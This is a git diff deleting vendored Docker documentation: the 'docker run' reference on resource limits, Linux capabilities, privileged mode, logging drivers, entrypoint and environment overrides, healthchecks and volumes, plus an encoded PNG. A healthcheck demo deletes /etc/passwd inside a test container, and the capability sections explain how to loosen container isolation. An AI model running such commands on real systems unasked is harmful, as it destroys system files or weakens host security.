- -Examples: - - $ docker run -it -m 500M --kernel-memory 50M ubuntu:14.04 /bin/bash - -We set memory and kernel memory, so the processes in the container can use -500M memory in total, in this 500M memory, it can be 50M kernel memory tops. - - $ docker run -it --kernel-memory 50M ubuntu:14.04 /bin/bash - -We set kernel memory without **-m**, so the processes in the container can -use as much memory as they want, but they can only use 50M kernel memory. - -### Swappiness constraint - -By default, a container's kernel can swap out a percentage of anonymous pages. -To set this percentage for a container, specify a `--memory-swappiness` value -between 0 and 100. A value of 0 turns off anonymous page swapping. A value of -100 sets all anonymous pages as swappable. By default, if you are not using -`--memory-swappiness`, memory swappiness value will be inherited from the parent. - -For example, you can set: - - $ docker run -it --memory-swappiness=0 ubuntu:14.04 /bin/bash - -Setting the `--memory-swappiness` option is helpful when you want to retain the -container's working set and to avoid swapping performance penalties. - -### CPU share constraint - -By default, all containers get the same proportion of CPU cycles. This proportion -can be modified by changing the container's CPU share weighting relative -to the weighting of all other running containers. - -To modify the proportion from the default of 1024, use the `-c` or `--cpu-shares` -flag to set the weighting to 2 or higher. If 0 is set, the system will ignore the -value and use the default of 1024. - -The proportion will only apply when CPU-intensive processes are running. -When tasks in one container are idle, other containers can use the -left-over CPU time. The actual amount of CPU time will vary depending on -the number of containers running on the system. - -For example, consider three containers, one has a cpu-share of 1024 and -two others have a cpu-share setting of 512. 
When processes in all three -containers attempt to use 100% of CPU, the first container would receive -50% of the total CPU time. If you add a fourth container with a cpu-share -of 1024, the first container only gets 33% of the CPU. The remaining containers -receive 16.5%, 16.5% and 33% of the CPU. - -On a multi-core system, the shares of CPU time are distributed over all CPU -cores. Even if a container is limited to less than 100% of CPU time, it can -use 100% of each individual CPU core. - -For example, consider a system with more than three cores. If you start one -container `{C0}` with `-c=512` running one process, and another container -`{C1}` with `-c=1024` running two processes, this can result in the following -division of CPU shares: - - PID container CPU CPU share - 100 {C0} 0 100% of CPU0 - 101 {C1} 1 100% of CPU1 - 102 {C1} 2 100% of CPU2 - -### CPU period constraint - -The default CPU CFS (Completely Fair Scheduler) period is 100ms. We can use -`--cpu-period` to set the period of CPUs to limit the container's CPU usage. -And usually `--cpu-period` should work with `--cpu-quota`. - -Examples: - - $ docker run -it --cpu-period=50000 --cpu-quota=25000 ubuntu:14.04 /bin/bash - -If there is 1 CPU, this means the container can get 50% CPU worth of run-time every 50ms. - -In addition to use `--cpu-period` and `--cpu-quota` for setting CPU period constraints, -it is possible to specify `--cpus` with a float number to achieve the same purpose. -For example, if there is 1 CPU, then `--cpus=0.5` will achieve the same result as -setting `--cpu-period=50000` and `--cpu-quota=25000` (50% CPU). - -The default value for `--cpus` is `0.000`, which means there is no limit. - -For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt). - -### Cpuset constraint - -We can set cpus in which to allow execution for containers. 
- -Examples: - - $ docker run -it --cpuset-cpus="1,3" ubuntu:14.04 /bin/bash - -This means processes in container can be executed on cpu 1 and cpu 3. - - $ docker run -it --cpuset-cpus="0-2" ubuntu:14.04 /bin/bash - -This means processes in container can be executed on cpu 0, cpu 1 and cpu 2. - -We can set mems in which to allow execution for containers. Only effective -on NUMA systems. - -Examples: - - $ docker run -it --cpuset-mems="1,3" ubuntu:14.04 /bin/bash - -This example restricts the processes in the container to only use memory from -memory nodes 1 and 3. - - $ docker run -it --cpuset-mems="0-2" ubuntu:14.04 /bin/bash - -This example restricts the processes in the container to only use memory from -memory nodes 0, 1 and 2. - -### CPU quota constraint - -The `--cpu-quota` flag limits the container's CPU usage. The default 0 value -allows the container to take 100% of a CPU resource (1 CPU). The CFS (Completely Fair -Scheduler) handles resource allocation for executing processes and is default -Linux Scheduler used by the kernel. Set this value to 50000 to limit the container -to 50% of a CPU resource. For multiple CPUs, adjust the `--cpu-quota` as necessary. -For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt). - -### Block IO bandwidth (Blkio) constraint - -By default, all containers get the same proportion of block IO bandwidth -(blkio). This proportion is 500. To modify this proportion, change the -container's blkio weight relative to the weighting of all other running -containers using the `--blkio-weight` flag. - -> **Note:** The blkio weight setting is only available for direct IO. Buffered IO -> is not currently supported. - -The `--blkio-weight` flag can set the weighting to a value between 10 to 1000. 
-For example, the commands below create two containers with different blkio -weight: - - $ docker run -it --name c1 --blkio-weight 300 ubuntu:14.04 /bin/bash - $ docker run -it --name c2 --blkio-weight 600 ubuntu:14.04 /bin/bash - -If you do block IO in the two containers at the same time, by, for example: - - $ time dd if=/mnt/zerofile of=test.out bs=1M count=1024 oflag=direct - -You'll find that the proportion of time is the same as the proportion of blkio -weights of the two containers. - -The `--blkio-weight-device="DEVICE_NAME:WEIGHT"` flag sets a specific device weight. -The `DEVICE_NAME:WEIGHT` is a string containing a colon-separated device name and weight. -For example, to set `/dev/sda` device weight to `200`: - - $ docker run -it \ - --blkio-weight-device "/dev/sda:200" \ - ubuntu - -If you specify both the `--blkio-weight` and `--blkio-weight-device`, Docker -uses the `--blkio-weight` as the default weight and uses `--blkio-weight-device` -to override this default with a new value on a specific device. -The following example uses a default weight of `300` and overrides this default -on `/dev/sda` setting that weight to `200`: - - $ docker run -it \ - --blkio-weight 300 \ - --blkio-weight-device "/dev/sda:200" \ - ubuntu - -The `--device-read-bps` flag limits the read rate (bytes per second) from a device. -For example, this command creates a container and limits the read rate to `1mb` -per second from `/dev/sda`: - - $ docker run -it --device-read-bps /dev/sda:1mb ubuntu - -The `--device-write-bps` flag limits the write rate (bytes per second) to a device. -For example, this command creates a container and limits the write rate to `1mb` -per second for `/dev/sda`: - - $ docker run -it --device-write-bps /dev/sda:1mb ubuntu - -Both flags take limits in the `:[unit]` format. Both read -and write rates must be a positive integer. You can specify the rate in `kb` -(kilobytes), `mb` (megabytes), or `gb` (gigabytes). 
- -The `--device-read-iops` flag limits read rate (IO per second) from a device. -For example, this command creates a container and limits the read rate to -`1000` IO per second from `/dev/sda`: - - $ docker run -ti --device-read-iops /dev/sda:1000 ubuntu - -The `--device-write-iops` flag limits write rate (IO per second) to a device. -For example, this command creates a container and limits the write rate to -`1000` IO per second to `/dev/sda`: - - $ docker run -ti --device-write-iops /dev/sda:1000 ubuntu - -Both flags take limits in the `:` format. Both read and -write rates must be a positive integer. - -## Additional groups - --group-add: Add additional groups to run as - -By default, the docker container process runs with the supplementary groups looked -up for the specified user. If one wants to add more to that list of groups, then -one can use this flag: - - $ docker run --rm --group-add audio --group-add nogroup --group-add 777 busybox id - uid=0(root) gid=0(root) groups=10(wheel),29(audio),99(nogroup),777 - -## Runtime privilege and Linux capabilities - - --cap-add: Add Linux capabilities - --cap-drop: Drop Linux capabilities - --privileged=false: Give extended privileges to this container - --device=[]: Allows you to run devices inside the container without the --privileged flag. - -By default, Docker containers are "unprivileged" and cannot, for -example, run a Docker daemon inside a Docker container. This is because -by default a container is not allowed to access any devices, but a -"privileged" container is given access to all devices (see -the documentation on [cgroups devices](https://www.kernel.org/doc/Documentation/cgroup-v1/devices.txt)). - -When the operator executes `docker run --privileged`, Docker will enable -access to all devices on the host as well as set some configuration -in AppArmor or SELinux to allow the container nearly all the same access to the -host as processes running outside containers on the host. 
Additional -information about running with `--privileged` is available on the -[Docker Blog](http://blog.docker.com/2013/09/docker-can-now-run-within-docker/). - -If you want to limit access to a specific device or devices you can use -the `--device` flag. It allows you to specify one or more devices that -will be accessible within the container. - - $ docker run --device=/dev/snd:/dev/snd ... - -By default, the container will be able to `read`, `write`, and `mknod` these devices. -This can be overridden using a third `:rwm` set of options to each `--device` flag: - - $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc - - Command (m for help): q - $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk /dev/xvdc - You will not be able to write the partition table. - - Command (m for help): q - - $ docker run --device=/dev/sda:/dev/xvdc:w --rm -it ubuntu fdisk /dev/xvdc - crash.... - - $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk /dev/xvdc - fdisk: unable to open /dev/xvdc: Operation not permitted - -In addition to `--privileged`, the operator can have fine grain control over the -capabilities using `--cap-add` and `--cap-drop`. By default, Docker has a default -list of capabilities that are kept. The following table lists the Linux capability -options which are allowed by default and can be dropped. - -| Capability Key | Capability Description | -| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- | -| SETPCAP | Modify process capabilities. | -| MKNOD | Create special files using mknod(2). | -| AUDIT_WRITE | Write records to kernel auditing log. | -| CHOWN | Make arbitrary changes to file UIDs and GIDs (see chown(2)). | -| NET_RAW | Use RAW and PACKET sockets. | -| DAC_OVERRIDE | Bypass file read, write, and execute permission checks. 
| -| FOWNER | Bypass permission checks on operations that normally require the file system UID of the process to match the UID of the file. | -| FSETID | Don't clear set-user-ID and set-group-ID permission bits when a file is modified. | -| KILL | Bypass permission checks for sending signals. | -| SETGID | Make arbitrary manipulations of process GIDs and supplementary GID list. | -| SETUID | Make arbitrary manipulations of process UIDs. | -| NET_BIND_SERVICE | Bind a socket to internet domain privileged ports (port numbers less than 1024). | -| SYS_CHROOT | Use chroot(2), change root directory. | -| SETFCAP | Set file capabilities. | - -The next table shows the capabilities which are not granted by default and may be added. - -| Capability Key | Capability Description | -| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- | -| SYS_MODULE | Load and unload kernel modules. | -| SYS_RAWIO | Perform I/O port operations (iopl(2) and ioperm(2)). | -| SYS_PACCT | Use acct(2), switch process accounting on or off. | -| SYS_ADMIN | Perform a range of system administration operations. | -| SYS_NICE | Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes. | -| SYS_RESOURCE | Override resource Limits. | -| SYS_TIME | Set system clock (settimeofday(2), stime(2), adjtimex(2)); set real-time (hardware) clock. | -| SYS_TTY_CONFIG | Use vhangup(2); employ various privileged ioctl(2) operations on virtual terminals. | -| AUDIT_CONTROL | Enable and disable kernel auditing; change auditing filter rules; retrieve auditing status and filtering rules. | -| MAC_OVERRIDE | Allow MAC configuration or state changes. Implemented for the Smack LSM. | -| MAC_ADMIN | Override Mandatory Access Control (MAC). Implemented for the Smack Linux Security Module (LSM). | -| NET_ADMIN | Perform various network-related operations. 
| -| SYSLOG | Perform privileged syslog(2) operations. | -| DAC_READ_SEARCH | Bypass file read permission checks and directory read and execute permission checks. | -| LINUX_IMMUTABLE | Set the FS_APPEND_FL and FS_IMMUTABLE_FL i-node flags. | -| NET_BROADCAST | Make socket broadcasts, and listen to multicasts. | -| IPC_LOCK | Lock memory (mlock(2), mlockall(2), mmap(2), shmctl(2)). | -| IPC_OWNER | Bypass permission checks for operations on System V IPC objects. | -| SYS_PTRACE | Trace arbitrary processes using ptrace(2). | -| SYS_BOOT | Use reboot(2) and kexec_load(2), reboot and load a new kernel for later execution. | -| LEASE | Establish leases on arbitrary files (see fcntl(2)). | -| WAKE_ALARM | Trigger something that will wake up the system. | -| BLOCK_SUSPEND | Employ features that can block system suspend. | - -Further reference information is available on the [capabilities(7) - Linux man page](http://man7.org/linux/man-pages/man7/capabilities.7.html) - -Both flags support the value `ALL`, so if the -operator wants to have all capabilities but `MKNOD` they could use: - - $ docker run --cap-add=ALL --cap-drop=MKNOD ... - -For interacting with the network stack, instead of using `--privileged` they -should use `--cap-add=NET_ADMIN` to modify the network interfaces. 
- - $ docker run -it --rm ubuntu:14.04 ip link add dummy0 type dummy - RTNETLINK answers: Operation not permitted - $ docker run -it --rm --cap-add=NET_ADMIN ubuntu:14.04 ip link add dummy0 type dummy - -To mount a FUSE based filesystem, you need to combine both `--cap-add` and -`--device`: - - $ docker run --rm -it --cap-add SYS_ADMIN sshfs sshfs sven@10.10.10.20:/home/sven /mnt - fuse: failed to open /dev/fuse: Operation not permitted - $ docker run --rm -it --device /dev/fuse sshfs sshfs sven@10.10.10.20:/home/sven /mnt - fusermount: mount failed: Operation not permitted - $ docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs - # sshfs sven@10.10.10.20:/home/sven /mnt - The authenticity of host '10.10.10.20 (10.10.10.20)' can't be established. - ECDSA key fingerprint is 25:34:85:75:25:b0:17:46:05:19:04:93:b5:dd:5f:c6. - Are you sure you want to continue connecting (yes/no)? yes - sven@10.10.10.20's password: - root@30aa0cfaf1b5:/# ls -la /mnt/src/docker - total 1516 - drwxrwxr-x 1 1000 1000 4096 Dec 4 06:08 . - drwxrwxr-x 1 1000 1000 4096 Dec 4 11:46 .. - -rw-rw-r-- 1 1000 1000 16 Oct 8 00:09 .dockerignore - -rwxrwxr-x 1 1000 1000 464 Oct 8 00:09 .drone.yml - drwxrwxr-x 1 1000 1000 4096 Dec 4 06:11 .git - -rw-rw-r-- 1 1000 1000 461 Dec 4 06:08 .gitignore - .... - -The default seccomp profile will adjust to the selected capabilities, in order to allow -use of facilities allowed by the capabilities, so you should not have to adjust this, -since Docker 1.12. In Docker 1.10 and 1.11 this did not happen and it may be necessary -to use a custom seccomp profile or use `--security-opt seccomp=unconfined` when adding -capabilities. - -## Logging drivers (--log-driver) - -The container can have a different logging driver than the Docker daemon. Use -the `--log-driver=VALUE` with the `docker run` command to configure the -container's logging driver. 
The following options are supported: - -| Driver | Description | -| ----------- | ----------------------------------------------------------------------------------------------------------------------------- | -| `none` | Disables any logging for the container. `docker logs` won't be available with this driver. | -| `json-file` | Default logging driver for Docker. Writes JSON messages to file. No logging options are supported for this driver. | -| `syslog` | Syslog logging driver for Docker. Writes log messages to syslog. | -| `journald` | Journald logging driver for Docker. Writes log messages to `journald`. | -| `gelf` | Graylog Extended Log Format (GELF) logging driver for Docker. Writes log messages to a GELF endpoint like Graylog or Logstash. | -| `fluentd` | Fluentd logging driver for Docker. Writes log messages to `fluentd` (forward input). | -| `awslogs` | Amazon CloudWatch Logs logging driver for Docker. Writes log messages to Amazon CloudWatch Logs | -| `splunk` | Splunk logging driver for Docker. Writes log messages to `splunk` using HTTP Event Collector. | - -The `docker logs` command is available only for the `json-file` and `journald` -logging drivers. For detailed information on working with logging drivers, see -[Configure a logging driver](https://docs.docker.com/engine/admin/logging/overview/). - - -## Overriding Dockerfile image defaults - -When a developer builds an image from a [*Dockerfile*](builder.md) -or when she commits it, the developer can set a number of default parameters -that take effect when the image starts up as a container. - -Four of the Dockerfile commands cannot be overridden at runtime: `FROM`, -`MAINTAINER`, `RUN`, and `ADD`. Everything else has a corresponding override -in `docker run`. We'll go through what the developer might have set in each -Dockerfile instruction and how the operator can override that setting. 
- - - [CMD (Default Command or Options)](#cmd-default-command-or-options) - - [ENTRYPOINT (Default Command to Execute at Runtime)]( - #entrypoint-default-command-to-execute-at-runtime) - - [EXPOSE (Incoming Ports)](#expose-incoming-ports) - - [ENV (Environment Variables)](#env-environment-variables) - - [HEALTHCHECK](#healthcheck) - - [VOLUME (Shared Filesystems)](#volume-shared-filesystems) - - [USER](#user) - - [WORKDIR](#workdir) - -### CMD (default command or options) - -Recall the optional `COMMAND` in the Docker -commandline: - - $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...] - -This command is optional because the person who created the `IMAGE` may -have already provided a default `COMMAND` using the Dockerfile `CMD` -instruction. As the operator (the person running a container from the -image), you can override that `CMD` instruction just by specifying a new -`COMMAND`. - -If the image also specifies an `ENTRYPOINT` then the `CMD` or `COMMAND` -get appended as arguments to the `ENTRYPOINT`. - -### ENTRYPOINT (default command to execute at runtime) - - --entrypoint="": Overwrite the default entrypoint set by the image - -The `ENTRYPOINT` of an image is similar to a `COMMAND` because it -specifies what executable to run when the container starts, but it is -(purposely) more difficult to override. The `ENTRYPOINT` gives a -container its default nature or behavior, so that when you set an -`ENTRYPOINT` you can run the container *as if it were that binary*, -complete with default options, and you can pass in more options via the -`COMMAND`. But, sometimes an operator may want to run something else -inside the container, so you can override the default `ENTRYPOINT` at -runtime by using a string to specify the new `ENTRYPOINT`. 
Here is an -example of how to run a shell in a container that has been set up to -automatically run something else (like `/usr/bin/redis-server`): - - $ docker run -it --entrypoint /bin/bash example/redis - -or two examples of how to pass more parameters to that ENTRYPOINT: - - $ docker run -it --entrypoint /bin/bash example/redis -c ls -l - $ docker run -it --entrypoint /usr/bin/redis-cli example/redis --help - -You can reset a container's entrypoint by passing an empty string, for example: - - $ docker run -it --entrypoint="" mysql bash - -> **Note**: Passing `--entrypoint` will clear out any default command set on the -> image (i.e. any `CMD` instruction in the Dockerfile used to build it). - -### EXPOSE (incoming ports) - -The following `run` command options work with container networking: - - --expose=[]: Expose a port or a range of ports inside the container. - These are additional to those exposed by the `EXPOSE` instruction - -P : Publish all exposed ports to the host interfaces - -p=[] : Publish a container's port or a range of ports to the host - format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort - Both hostPort and containerPort can be specified as a - range of ports. When specifying ranges for both, the - number of container ports in the range must match the - number of host ports in the range, for example: - -p 1234-1236:1234-1236/tcp - - When specifying a range for hostPort only, the - containerPort must not be a range. In this case the - container port is published somewhere within the - specified hostPort range. (e.g., `-p 1234-1236:1234/tcp`) - - (use 'docker port' to see the actual mapping) - - --link="" : Add link to another container (:alias or ) - -With the exception of the `EXPOSE` directive, an image developer hasn't -got much control over networking. The `EXPOSE` instruction defines the -initial incoming ports that provide services. These ports are available -to processes inside the container. 
An operator can use the `--expose` -option to add to the exposed ports. - -To expose a container's internal port, an operator can start the -container with the `-P` or `-p` flag. The exposed port is accessible on -the host and the ports are available to any client that can reach the -host. - -The `-P` option publishes all the ports to the host interfaces. Docker -binds each exposed port to a random port on the host. The range of -ports are within an *ephemeral port range* defined by -`/proc/sys/net/ipv4/ip_local_port_range`. Use the `-p` flag to -explicitly map a single port or range of ports. - -The port number inside the container (where the service listens) does -not need to match the port number exposed on the outside of the -container (where clients connect). For example, inside the container an -HTTP service is listening on port 80 (and so the image developer -specifies `EXPOSE 80` in the Dockerfile). At runtime, the port might be -bound to 42800 on the host. To find the mapping between the host ports -and the exposed ports, use `docker port`. - -If the operator uses `--link` when starting a new client container in the -default bridge network, then the client container can access the exposed -port via a private networking interface. -If `--link` is used when starting a container in a user-defined network as -described in [*Docker network overview*](https://docs.docker.com/engine/userguide/networking/), -it will provide a named alias for the container being linked to. 
- -### ENV (environment variables) - -When a new container is created, Docker will set the following environment -variables automatically: - -| Variable | Value | -| -------- | ----- | -| `HOME` | Set based on the value of `USER` | -| `HOSTNAME` | The hostname associated with the container | -| `PATH` | Includes popular directories, such as `:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` | -| `TERM` | `xterm` if the container is allocated a pseudo-TTY | - -Additionally, the operator can **set any environment variable** in the -container by using one or more `-e` flags, even overriding those mentioned -above, or already defined by the developer with a Dockerfile `ENV`: - - $ docker run -e "deep=purple" --rm ubuntu /bin/bash -c export - declare -x HOME="/" - declare -x HOSTNAME="85bc26a0e200" - declare -x OLDPWD - declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" - declare -x PWD="/" - declare -x SHLVL="1" - declare -x deep="purple" - -Similarly the operator can set the **hostname** with `-h`. 
- -### HEALTHCHECK - -``` - --health-cmd Command to run to check health - --health-interval Time between running the check - --health-retries Consecutive failures needed to report unhealthy - --health-timeout Maximum time to allow one check to run - --no-healthcheck Disable any container-specified HEALTHCHECK -``` - -Example: - - {% raw %} - $ docker run --name=test -d \ - --health-cmd='stat /etc/passwd || exit 1' \ - --health-interval=2s \ - busybox sleep 1d - $ sleep 2; docker inspect --format='{{.State.Health.Status}}' test - healthy - $ docker exec test rm /etc/passwd - $ sleep 2; docker inspect --format='{{json .State.Health}}' test - { - "Status": "unhealthy", - "FailingStreak": 3, - "Log": [ - { - "Start": "2016-05-25T17:22:04.635478668Z", - "End": "2016-05-25T17:22:04.7272552Z", - "ExitCode": 0, - "Output": " File: /etc/passwd\n Size: 334 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 32h/50d\tInode: 12 Links: 1\nAccess: (0664/-rw-rw-r--) Uid: ( 0/ root) Gid: ( 0/ root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..." - }, - { - "Start": "2016-05-25T17:22:06.732900633Z", - "End": "2016-05-25T17:22:06.822168935Z", - "ExitCode": 0, - "Output": " File: /etc/passwd\n Size: 334 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 32h/50d\tInode: 12 Links: 1\nAccess: (0664/-rw-rw-r--) Uid: ( 0/ root) Gid: ( 0/ root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..." 
- }, - { - "Start": "2016-05-25T17:22:08.823956535Z", - "End": "2016-05-25T17:22:08.897359124Z", - "ExitCode": 1, - "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" - }, - { - "Start": "2016-05-25T17:22:10.898802931Z", - "End": "2016-05-25T17:22:10.969631866Z", - "ExitCode": 1, - "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" - }, - { - "Start": "2016-05-25T17:22:12.971033523Z", - "End": "2016-05-25T17:22:13.082015516Z", - "ExitCode": 1, - "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" - } - ] - } - {% endraw %} - -The health status is also displayed in the `docker ps` output. - -### TMPFS (mount tmpfs filesystems) - -```bash ---tmpfs=[]: Create a tmpfs mount with: container-dir[:], - where the options are identical to the Linux - 'mount -t tmpfs -o' command. -``` - -The example below mounts an empty tmpfs into the container with the `rw`, -`noexec`, `nosuid`, and `size=65536k` options. - - $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image - -### VOLUME (shared filesystems) - - -v, --volume=[host-src:]container-dest[:]: Bind mount a volume. - The comma-delimited `options` are [rw|ro], [z|Z], - [[r]shared|[r]slave|[r]private], and [nocopy]. - The 'host-src' is an absolute path or a name value. - - If neither 'rw' or 'ro' is specified then the volume is mounted in - read-write mode. - - The `nocopy` modes is used to disable automatic copying requested volume - path in the container to the volume storage location. - For named volumes, `copy` is the default mode. Copy modes are not supported - for bind-mounted volumes. - - --volumes-from="": Mount all volumes from the given container(s) - -> **Note**: -> When using systemd to manage the Docker daemon's start and stop, in the systemd -> unit file there is an option to control mount propagation for the Docker daemon -> itself, called `MountFlags`. 
The value of this setting may cause Docker to not -> see mount propagation changes made on the mount point. For example, if this value -> is `slave`, you may not be able to use the `shared` or `rshared` propagation on -> a volume. - -The volumes commands are complex enough to have their own documentation -in section [*Manage data in -containers*](https://docs.docker.com/engine/tutorials/dockervolumes/). A developer can define -one or more `VOLUME`'s associated with an image, but only the operator -can give access from one container to another (or from a container to a -volume mounted on the host). - -The `container-dest` must always be an absolute path such as `/src/docs`. -The `host-src` can either be an absolute path or a `name` value. If you -supply an absolute path for the `host-dir`, Docker bind-mounts to the path -you specify. If you supply a `name`, Docker creates a named volume by that `name`. - -A `name` value must start with an alphanumeric character, -followed by `a-z0-9`, `_` (underscore), `.` (period) or `-` (hyphen). -An absolute path starts with a `/` (forward slash). - -For example, you can specify either `/foo` or `foo` for a `host-src` value. -If you supply the `/foo` value, Docker creates a bind-mount. If you supply -the `foo` specification, Docker creates a named volume. - -### USER - -`root` (id = 0) is the default user within a container. The image developer can -create additional users. Those users are accessible by name. When passing a numeric -ID, the user does not have to exist in the container. - -The developer can set a default user to run the first process with the -Dockerfile `USER` instruction. When starting a container, the operator can override -the `USER` instruction by passing the `-u` option. - - -u="", --user="": Sets the username or UID used and optionally the groupname or GID for the specified command. 
- - The followings examples are all valid: - --user=[ user | user:group | uid | uid:gid | user:gid | uid:group ] - -> **Note:** if you pass a numeric uid, it must be in the range of 0-2147483647. - -### WORKDIR - -The default working directory for running binaries within a container is the -root directory (`/`), but the developer can set a different default with the -Dockerfile `WORKDIR` command. The operator can override this with: - - -w="": Working directory inside the container diff --git a/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png b/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png deleted file mode 100644 index 717d09d773cc46ff8297d06f66d9aa855453f35a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4972 zcmai&cQD-D+s0R0Yj^ebT|uHmbh}CrD|!v0*I@N7h>`>myRteVy6C-&h-eWTEJBos z9-<^fCwij%@;vj-``7QC_sp5O=f2Ko?rY{;=dTm3uctu`WrKo1AZjg5RYMSn3;=;h zs3By3m9`raW`B#bzK*fl-zuwX{C{n-Y$9*-1}L@}R6Pc&oVoU4=l$%0kfT3mND56# zql9}1Uva-kRFRCXF3fhIFQ&XZ}oXTOFRof05QPgBSL6y@1 zl15u3N2zTTe@FcP3$ULSt)XykoVa5Zj-VooAmOmv9K8eRY%r?F2HGJ->^d)z>(fIs z36C3F!*19iQFc#}ioi8E9r%m^O#b1iB0vWrBehe!28TqDgd?xf{jbPSRx|Sc$2mT7 z&m4NttP7}oTSZqXK&JR-6bJ@`zvwcz;r&N4lZ@wj+)(lm!0-sOe} z(k90<@DUDRX8FZ{eyz|1*xIhv%ID3D&1ChI_x`>`Gg;e4bH{_FXe&)x)O!9J{%Jv8 z10pkYH+EE#h@}O2-tj)+FGjX?9&g?%(*vn1tBCYe=Zl)^89~AWtfi;p zbU;b51Uq2kF^Z?IQ(~B|4Iu3_9+o_vFy7H(O8)Wz`Gex&iU2ojQM<@HGj-r2_lrl0U+sN@`J7yX!f1reW_&hJt$I=ng)fsW zyM^%)1x-`I;ysWvqdO~<8gfwWjnv|tC z>F&Q@wW<xfkQ`kwLi(OUouG{MHZ^K0!I&e+06+Oh!1%0UD4#6)B&= z``nN0G{ydfi6juFE*nQ=srFgEaf7z#zakhZrMDm(byQq_VH7tWltTYlN=oY4G9P+p+<^<4=s4n*Xxg_SIz(Q}^0KKI9uw{k^j_ zMOFA(?j7s1Mr0qqa&JjW$S_+=iVjMEHu(J#Edz5Awt)IziHVMWC}rYDyUnB}>NI<# zKLF`P%aUNM?4SlC+A^yMmOR|c&=!nOH55Aa=uc5HY+X!?0tTkvG_gKm15Ox~Fdtf! z`fTZO5?g@IeWGkTG9~8yHTCN&Lk+vj7dl+F{@7>+SWE(&arXi;Zjn*I0Idx5(r zbR1%nDN3=hhhP{pPVCh2HZ${01N6PkQx$>Q(DEo>A%8Z~_LGqHX1M7Gjec|ij00W? 
z9s6Kw@f=_mO4WdgEnN*>o&7EeiP-CGIFqfDejyp1b3)v?6sQ@Gj-R`2r}f2WexHb_ z6ZU%agw8y_oqjXM+pQcNXZ89xhKiVi+NZ%!q>v(W#4~)Vp_WWSzPEvw4tg4jmXe!1 zEGE`fmefFeS(Q2mtHEesd0sEZ6^kHPJVgno!@w>h{rP(O<}eGR=yj5=&q36W?!CM* z`T?8NFbF4%Q1FzoiPn2^0xuW6^vgKCZXS>j=P?+byDBuSwi30O@hM`Io%)pfri+5Y zk%Z?h`B58R6PkE_gO=;U7vY~AF~T-80ixA6;^E|7e4im?11VycOmIh|iAjMM&)Qxl z$`YSoFv8BFNMJ67@T|c8x*Ad*k-(%4z-99%C#jV4MOPh6)@gBs{l#(bL#1_bLeuOJ zMadQ+Zrrzkl8n4jImhy}u&$}}svi0_5VZC!&wT8_=OsUE|1OgTR~ncer@z#3)YaYQ*?#WrxabQv(>BcRlJOplPc+`&byEqu zSe;z0F6W5sjW{-LbqNo*Y8cT}Bb@z~yI9DLEWN1oWe59z_@ipp zLstkhb7SjtG)K5p8T!^o*bGI%V$0FtNoMIlpau7F(lUkM%3oy@Jgwn}2mJpbVsv zYUL1a#7{fVYxYs?5QBa>1dF#(YQhTY<{rU_!+3F{U(;V?U7m}mCSv`f%>`KB;P!kz zg}Xt&!&;r5fbo;^e-?ODNKx7pBCMv5#Q=9?Z@%340qiWT_HhME+>aGnjB0hEx9mrZ zIf7LeNftg$1IABOR1cnJ&qr69m%R&KzW)Zx^)>eOoLqsYeKH1V{eGaYc$UzK%N(u$ z8MW|qaibkx?1xOd_cB&)9AYUp%jDLJF*q<0_OQFoT5UI4v*lLd)Ct+4ihEmPIr4mv zT3^spo(F~bh_%?WfMyxf;(r^`B|7|(5^YW+;rXpVt6mmzj@;~|;6wte-q-K0Yp_`( zJ;nRYI;I)n>4&$m?y~DBjcs??K>Dz|ef!&(xG(F?8Kqn13naL`$21$cW{lQy$eZwAn~26|FVhQ)&w*@?T;1__?~Q@@RdnRBxDK)W08rl#y?Q zHt6|Y@KA+1?$y3I0R|XEtQ~@(1K^*1>=HW?FL;Gfrn>2X2{)Pq4;z=^FGBy{4 zfjcO)iMEO5!G5H(2PbPs`79(Gg*|FPTSn##qwNj0e}D*6oWkc+NHkG`3@+qjcLh$g z6T8BcIDh5pr@KhK)%}u<*)k0r-o>NFVRBhT%@AQ;O!g*VVZ;OS{t5M+4pX8jTz!fP zUT2PV&V>2OR%#=s5Hrr=k$-fVU2zn>Jc>pmcCD1_#PBHiv8-}q9RPJ1Z_sK3Y# zA27HxB}mSrs&X~!2ZtFIUal{SOK+u$jHlZ&q4q)-v2%g|cEWybWn=rLZAxos;_5{; z%tB8~2Eq>yW6O^wzAD|gfDOFqkjc0CGjmeiY_{XOG^?&-Q6$HP^*dnBu3^{n^e50%;zmk zwc;)Dh{=LBWv_i3!meuG>@sfew~lS&oWM4(iks3~-(?eX81YZI(rwzn7q8e4y$L78 z`4+D#Dl)qaN59RF&-9O!cN;@5)2r>hJYeq;n$uAs@2Z01pYA*HDdD&aosaAzKvx8E z;z|5zUuN5_;k4*HQvgTq^b((I=_2NFM6PVep|fAkTQCl z&iA*FJ-;u>J+8DJ8E=4sJW@%+GeXvl%);76DFJM__y<;;3%*z(2_yT_d4Q#h(SXz0 z6TG{`sFOjtl5o`&3Ged>L{cVrz63hs^eEUZ6D*s7n5fFr7<#%-3rYTGcaKbhthnSZ 